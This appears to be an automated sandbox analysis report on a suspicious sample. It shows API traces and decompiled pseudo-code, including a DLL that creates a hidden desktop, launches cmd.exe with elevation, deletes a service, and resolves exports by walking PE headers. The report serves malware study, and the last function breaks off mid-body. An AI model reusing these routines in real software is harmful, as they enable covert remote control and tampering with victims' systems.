                                                                                                                        • SetWindowLongA.USER32 ref: 6F339CB8
                                                                                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?,?,00000001,FF000000), ref: 6F339CCB
                                                                                                                        • BringWindowToTop.USER32(00000000), ref: 6F339CD2
                                                                                                                        • SetForegroundWindow.USER32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F339CD9
                                                                                                                        • SendMessageA.USER32(00000000,00000473,00000001,00000001), ref: 6F339CEF
                                                                                                                        • SendMessageA.USER32(00000000,0000046F,00000008,00000000), ref: 6F339CFB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$LongMessageSend$BringForeground
                                                                                                                        • String ID: cmd.exe$runas
                                                                                                                        • API String ID: 4108379202-3213582026
                                                                                                                        • Opcode ID: 555d3d43088666f46df829d9956af25fa9106857c7ef8af4542967abe5e26d94
                                                                                                                        • Instruction ID: b32eff405f08732c2e7ed454381ec473309fef06366ecf7992b5a1978658f110
                                                                                                                        • Opcode Fuzzy Hash: 555d3d43088666f46df829d9956af25fa9106857c7ef8af4542967abe5e26d94
                                                                                                                        • Instruction Fuzzy Hash: 4211C8337456A877E621DA28CC06F8A366EEB82B31F104218F751EA0C4CBB56510C769
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0040E362
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040E36C
                                                                                                                        • int.LIBCPMT ref: 0040E383
                                                                                                                          • Part of subcall function 0040CBDA: std::_Lockit::_Lockit.LIBCPMT ref: 0040CBEB
                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040E38C
                                                                                                                        • ctype.LIBCPMT ref: 0040E3A3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E3C4
                                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 0040E3D4
                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0040E3DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 120779050-3145022300
                                                                                                                        • Opcode ID: a3f5a699adb3e8ce1de92f44d0c6cbb95e41f30e4809f8d1d1f0b06f44f70e31
                                                                                                                        • Instruction ID: 841ff04405bbb0316b189403db5acfa989f72495a0dc73ffcde05ec93c02125f
                                                                                                                        • Opcode Fuzzy Hash: a3f5a699adb3e8ce1de92f44d0c6cbb95e41f30e4809f8d1d1f0b06f44f70e31
                                                                                                                        • Instruction Fuzzy Hash: 6701C47190011687CF05FBA1C896AAE7B35BF94310F140A2AF910BB2D1DF78DA018B95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004167B2
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004167BC
                                                                                                                        • int.LIBCPMT ref: 004167D3
                                                                                                                          • Part of subcall function 0040CBDA: std::_Lockit::_Lockit.LIBCPMT ref: 0040CBEB
                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004167DC
                                                                                                                        • codecvt.LIBCPMT ref: 004167F3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00416814
                                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 00416824
                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0041682A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3147950714-3145022300
                                                                                                                        • Opcode ID: e0b5572c8548c622a75575ecca87d9ab55f25f090f024946b680356e8335b644
                                                                                                                        • Instruction ID: 2b815d97ff2e244cc09361beeea4d35a65eaf0dc4f538e06f9ae997cda8be315
                                                                                                                        • Opcode Fuzzy Hash: e0b5572c8548c622a75575ecca87d9ab55f25f090f024946b680356e8335b644
                                                                                                                        • Instruction Fuzzy Hash: 3901C47190011697DF05FBA0C856AEEB775BF80720F15161AE111AB2D1DF38DD42C795
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0041BA41
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0041BA4B
                                                                                                                        • int.LIBCPMT ref: 0041BA62
                                                                                                                          • Part of subcall function 0040CBDA: std::_Lockit::_Lockit.LIBCPMT ref: 0040CBEB
                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0041BA6B
                                                                                                                        • ctype.LIBCPMT ref: 0041BA82
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0041BAA3
                                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 0041BAB3
                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0041BAB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 120779050-3145022300
                                                                                                                        • Opcode ID: 75c4273c6261778f6183f469528b7ab2c57b77ad1db2470bd254bf1126a2ea1e
                                                                                                                        • Instruction ID: a76356c260c168ed5891337836b1ee3f77fb3caad6dbeb86e808316f575d28fe
                                                                                                                        • Opcode Fuzzy Hash: 75c4273c6261778f6183f469528b7ab2c57b77ad1db2470bd254bf1126a2ea1e
                                                                                                                        • Instruction Fuzzy Hash: 5D01007190020A87CF01FBA0C896AEE7775BF907A0F28021AE110BB2D1DF389E418791
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F339BD0(void* _a4) {
                                                                                                                        				struct HDESK__* _t3;
                                                                                                                        				struct HDESK__* _t9;
                                                                                                                        				void* _t11;
                                                                                                                        
                                                                                                                        				_t3 = GetThreadDesktop(GetCurrentThreadId());
                                                                                                                        				 *0x6f340484 = _t3;
                                                                                                                        				if(_t3 != 0) {
                                                                                                                        					_t3 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
                                                                                                                        					 *0x6f340480 = _t3;
                                                                                                                        					if(_t3 != 0) {
                                                                                                                        						_t11 = CreateThread(0, 0, E6F3396D0, _a4, 0, 0);
                                                                                                                        						if(_t11 != 0) {
                                                                                                                        							WaitForSingleObject(_t11, 0xffffffff);
                                                                                                                        							CloseHandle(_t11);
                                                                                                                        							Sleep(0xfa0);
                                                                                                                        						}
                                                                                                                        						_t9 =  *0x6f340480; // 0x0
                                                                                                                        						return CloseDesktop(_t9);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t3;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F339BD0
                                                                                                                        • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6F339BD7
                                                                                                                        • CreateDesktopA.USER32 ref: 6F339BF8
                                                                                                                        • CreateThread.KERNEL32 ref: 6F339C1A
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?), ref: 6F339C29
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F339C30
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?), ref: 6F339C3B
                                                                                                                        • CloseDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6F339C48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: DesktopThread$CloseCreate$CurrentHandleObjectSingleSleepWait
                                                                                                                        • String ID: TVRF_Instance
                                                                                                                        • API String ID: 4135746217-3589830093
                                                                                                                        • Opcode ID: fedd9254724c76e711d53106da9812ed215534b8b0421131250b4c86665399ae
                                                                                                                        • Instruction ID: 3b1c4acbcab4871b2534a89a24d0069648c58b50cac7b3d4e0e0623ae70a3b4e
                                                                                                                        • Opcode Fuzzy Hash: fedd9254724c76e711d53106da9812ed215534b8b0421131250b4c86665399ae
                                                                                                                        • Instruction Fuzzy Hash: 2BF03177A41EA6EBEA71EB608C49F55366EAB06731F100108F611A52C4CF70E4209A18
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F333700(char* _a4, intOrPtr _a8) {
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				struct _SERVICE_STATUS _v28;
                                                                                                                        				int _v32;
                                                                                                                        				char* _t12;
                                                                                                                        				void* _t24;
                                                                                                                        				void* _t28;
                                                                                                                        				void* _t31;
                                                                                                                        				int _t32;
                                                                                                                        
                                                                                                                        				_t32 = 0;
                                                                                                                        				_v32 = 0;
                                                                                                                        				_t12 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                                                        				_t24 = _t12;
                                                                                                                        				if(_t24 != 0) {
                                                                                                                        					L2:
                                                                                                                        					_t28 = OpenServiceA(_t24, _a4, 0xf01ff);
                                                                                                                        					if(_t28 == 0) {
                                                                                                                        						L13:
                                                                                                                        						CloseServiceHandle(_t24);
                                                                                                                        						L14:
                                                                                                                        						return _t32;
                                                                                                                        					}
                                                                                                                        					QueryServiceStatus(_t28,  &_v28);
                                                                                                                        					if(_v24 == 1) {
                                                                                                                        						L9:
                                                                                                                        						if(_a8 != 0) {
                                                                                                                        							_v32 = DeleteService(_t28);
                                                                                                                        						} else {
                                                                                                                        							_v32 = 1;
                                                                                                                        						}
                                                                                                                        						L12:
                                                                                                                        						CloseServiceHandle(_t28);
                                                                                                                        						_t32 = _v32;
                                                                                                                        						goto L13;
                                                                                                                        					}
                                                                                                                        					if(ControlService(_t28, 1,  &_v28) == 0) {
                                                                                                                        						goto L12;
                                                                                                                        					}
                                                                                                                        					_t31 = 0;
                                                                                                                        					while(1) {
                                                                                                                        						QueryServiceStatus(_t28,  &_v28);
                                                                                                                        						if(_v24 == 1) {
                                                                                                                        							goto L9;
                                                                                                                        						}
                                                                                                                        						Sleep(0x3e8);
                                                                                                                        						_t31 = _t31 + 1;
                                                                                                                        						if(_t31 < 0x3c) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						goto L12;
                                                                                                                        					}
                                                                                                                        					goto L9;
                                                                                                                        				}
                                                                                                                        				_t24 = OpenSCManagerA(_t12, _t12, 1);
                                                                                                                        				if(_t24 == 0) {
                                                                                                                        					goto L14;
                                                                                                                        				}
                                                                                                                        				goto L2;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F333719
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F333725
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F33373D
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F33374F
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 6F333764
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33377C
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F33378E
                                                                                                                        • DeleteService.ADVAPI32(00000000), ref: 6F3337AA
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337B5
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F3337C0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$Open$CloseHandleManagerQueryStatus$ControlDeleteSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3264530519-0
                                                                                                                        • Opcode ID: d1ddb42e66a8eb90f4376716a6b95f4a27417c971984c5e5bba463e16b09566a
                                                                                                                        • Instruction ID: 5263d4b2a8fcea566895c1d9edce346c899a6bba8f128117c562c56ae9b7ae69
                                                                                                                        • Opcode Fuzzy Hash: d1ddb42e66a8eb90f4376716a6b95f4a27417c971984c5e5bba463e16b09566a
                                                                                                                        • Instruction Fuzzy Hash: F32105B3904799ABD710DF648CC9A7F77FDEB8AB11F00051DF94086100DBB1E8498762
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BF7ED
                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000004B,?,?), ref: 004BF826
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004BF831
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004BEF63: __EH_prolog3.LIBCMT ref: 004BEF6A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalErrorInitializeInternetLastOptionQuerySection
                                                                                                                        • String ID: , m_Proxy.Proxy_Exceptions == $InternetQueryOption failed! (%d)$http=$m_Proxy.IPIE ==
                                                                                                                        • API String ID: 1508298941-2056814762
                                                                                                                        • Opcode ID: f34b1b4911db29999f32bb6f2c589cc90698ff2e8e37ffb72dbf7c0a9d0188e0
                                                                                                                        • Instruction ID: 9ad1b6df3386e347a72d3cb7093f428499c490254f7866096eee2b8184655fb1
                                                                                                                        • Opcode Fuzzy Hash: f34b1b4911db29999f32bb6f2c589cc90698ff2e8e37ffb72dbf7c0a9d0188e0
                                                                                                                        • Instruction Fuzzy Hash: E571AFB0A00218ABDF14EBA5CD92AEDB779BB25304F50416EE11AB31D1DB785F05CB68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B8798
                                                                                                                          • Part of subcall function 004B91EF: _memset.LIBCMT ref: 004B9216
                                                                                                                        • OpenDesktopW.USER32(?,00000000,00000001,10000000), ref: 004B87DF
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 004B87EC
                                                                                                                        • GetLastError.KERNEL32 ref: 004B87F6
                                                                                                                        • CloseDesktop.USER32(00000000), ref: 004B8845
                                                                                                                        • GetLastError.KERNEL32 ref: 004B884D
                                                                                                                          • Part of subcall function 00404186: __EH_prolog3.LIBCMT ref: 0040418D
                                                                                                                          • Part of subcall function 004B58B0: __EH_prolog3_GS.LIBCMT ref: 004B58B7
                                                                                                                          • Part of subcall function 00401504: __EH_prolog3.LIBCMT ref: 0040150B
                                                                                                                        Strings
                                                                                                                        • ChangeThreadDesktop(): OpenDesktop failed for Desktop %1%: %2% (.\TVObject.cpp, 624), xrefs: 004B8853
                                                                                                                        • ChangeThreadDesktop(): SetThreadDesktop failed for %1%: %2% (.\TVObject.cpp, 612), xrefs: 004B87FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: DesktopH_prolog3$ErrorLast$CloseH_prolog3_OpenThread_memset
                                                                                                                        • String ID: ChangeThreadDesktop(): OpenDesktop failed for Desktop %1%: %2% (.\TVObject.cpp, 624)$ChangeThreadDesktop(): SetThreadDesktop failed for %1%: %2% (.\TVObject.cpp, 612)
                                                                                                                        • API String ID: 1705971431-2669621406
                                                                                                                        • Opcode ID: b0dab21630589a1f9e7a99ac4996d413d656b13754b0becca8355b2b31170537
                                                                                                                        • Instruction ID: 341cb4497560b5c40c3de215531c3c48982386b9da47b8e32fb245829e8f1ba8
                                                                                                                        • Opcode Fuzzy Hash: b0dab21630589a1f9e7a99ac4996d413d656b13754b0becca8355b2b31170537
                                                                                                                        • Instruction Fuzzy Hash: 04317071C01288EADF11EBB4CC5AAEEBB38AF10344F54849EF54567282DB788B45C776
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E6F338230(WCHAR* _a4, WCHAR* _a8) {
                                                                                                                        				long _t4;
                                                                                                                        				WCHAR* _t11;
                                                                                                                        				WCHAR* _t12;
                                                                                                                        				void* _t13;
                                                                                                                        
                                                                                                                        				_t12 = _a4;
                                                                                                                        				_t11 = _a8;
                                                                                                                        				if(_t12 == 0 || _t11 == 0) {
                                                                                                                        					L7:
                                                                                                                        					_push(_t11);
                                                                                                                        					_push(_t12);
                                                                                                                        					M6F3405F8();
                                                                                                                        					return _t4;
                                                                                                                        				} else {
                                                                                                                        					_t4 = GetFileAttributesW(_t12);
                                                                                                                        					if((_t4 & 0xffffffef) == 0) {
                                                                                                                        						goto L7;
                                                                                                                        					} else {
                                                                                                                        						_t4 = lstrcmpiW(PathFindFileNameW(_t11), L"run");
                                                                                                                        						if(_t4 != 0) {
                                                                                                                        							goto L7;
                                                                                                                        						} else {
                                                                                                                        							SetLastError(_t4);
                                                                                                                        							_t13 = E6F33A2F0(_t12, 0, 0);
                                                                                                                        							if(_t13 != 0) {
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        								_push(1);
                                                                                                                        								E6F334230("open", _t13, 0);
                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t13);
                                                                                                                        							}
                                                                                                                        							return 0;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 6F338243
                                                                                                                        • PathFindFileNameW.SHLWAPI(?,run), ref: 6F338256
                                                                                                                        • lstrcmpiW.KERNEL32(00000000), ref: 6F33825D
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6F338268
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A311
                                                                                                                          • Part of subcall function 6F33A2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                          • Part of subcall function 6F33A2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A33E
                                                                                                                          • Part of subcall function 6F334230: RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6F33423A
                                                                                                                          • Part of subcall function 6F334230: ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6F3342A7
                                                                                                                          • Part of subcall function 6F334230: WaitForSingleObject.KERNEL32(?,?), ref: 6F3342CD
                                                                                                                          • Part of subcall function 6F334230: GetExitCodeProcess.KERNEL32 ref: 6F3342E1
                                                                                                                          • Part of subcall function 6F334230: CloseHandle.KERNEL32(?), ref: 6F3342EC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33829A
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3382A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$ByteCharFileMultiWide$AllocAttributesCloseCodeErrorExecuteExitFindFreeHandleLastMemoryNameObjectPathShellSingleWaitZerolstrcmpi
                                                                                                                        • String ID: open$run
                                                                                                                        • API String ID: 2941314601-2128457515
                                                                                                                        • Opcode ID: 13b53d38b7ded8af4f79d3298f1d70a1a5f0f1b7e858ceb7254ef7d978c0a1ef
                                                                                                                        • Instruction ID: eafe0a8456b46b7470652278ffb60c0f41678d4b5b7510c2a5e2062331bb59c3
                                                                                                                        • Opcode Fuzzy Hash: 13b53d38b7ded8af4f79d3298f1d70a1a5f0f1b7e858ceb7254ef7d978c0a1ef
                                                                                                                        • Instruction Fuzzy Hash: EB01DB37E49FB47BDA30E6749D09FCB362DAF92B31F010009FD55E6080DB69D41246A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0040482D
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404837
                                                                                                                        • int.LIBCPMT ref: 0040484E
                                                                                                                          • Part of subcall function 0040CBDA: std::_Lockit::_Lockit.LIBCPMT ref: 0040CBEB
                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404857
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040488F
                                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 0040489F
                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 004048A5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 447036056-3145022300
                                                                                                                        • Opcode ID: 857079eb983983da00f42925b1e8a8b8f26dd6c4d5bdc9ccccb852d03e7f82a3
                                                                                                                        • Instruction ID: 471960133c701604e416d2b83f0f93bbbd75309162c0f2f2f7cb49415d960507
                                                                                                                        • Opcode Fuzzy Hash: 857079eb983983da00f42925b1e8a8b8f26dd6c4d5bdc9ccccb852d03e7f82a3
                                                                                                                        • Instruction Fuzzy Hash: 4501C47290021A97DF05FBA0C856AAE7B75BFC4710F144A2AE610BB2D1DF7CDD028795
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F331DB0() {
                                                                                                                        				short _t58;
                                                                                                                        				signed int _t60;
                                                                                                                        				signed int _t61;
                                                                                                                        				signed int _t63;
                                                                                                                        				signed int _t72;
                                                                                                                        				signed int _t73;
                                                                                                                        				intOrPtr _t77;
                                                                                                                        				signed int _t78;
                                                                                                                        				CHAR* _t80;
                                                                                                                        				signed int _t83;
                                                                                                                        				signed int _t89;
                                                                                                                        				intOrPtr* _t90;
                                                                                                                        				char* _t96;
                                                                                                                        				intOrPtr* _t101;
                                                                                                                        				char* _t103;
                                                                                                                        				CHAR* _t106;
                                                                                                                        				char* _t108;
                                                                                                                        				CHAR* _t109;
                                                                                                                        				short _t112;
                                                                                                                        				struct HINSTANCE__* _t115;
                                                                                                                        				void* _t116;
                                                                                                                        
                                                                                                                        				_t101 =  *((intOrPtr*)(_t116 + 0x3c));
                                                                                                                        				_t58 = 1;
                                                                                                                        				 *(_t116 + 0x14) = 1;
                                                                                                                        				if(_t101 == 0 ||  *_t101 != 0x5a4d) {
                                                                                                                        					L28:
                                                                                                                        					return _t58;
                                                                                                                        				} else {
                                                                                                                        					_t83 =  *((intOrPtr*)(_t101 + 0x3c)) + _t101;
                                                                                                                        					 *(_t116 + 0x24) = _t83;
                                                                                                                        					if( *_t83 != 0x4550) {
                                                                                                                        						goto L28;
                                                                                                                        					}
                                                                                                                        					_t77 =  *((intOrPtr*)(_t83 + 0x78));
                                                                                                                        					_t78 = _t77 + _t101;
                                                                                                                        					 *(_t116 + 0x24) =  *((intOrPtr*)(_t77 + _t101 + 0x1c)) + _t101;
                                                                                                                        					 *(_t116 + 0x20) =  *((intOrPtr*)(_t78 + 0x24)) + _t101;
                                                                                                                        					_t89 =  *((intOrPtr*)(_t78 + 0x20)) + _t101;
                                                                                                                        					 *(_t116 + 0x14) = _t78;
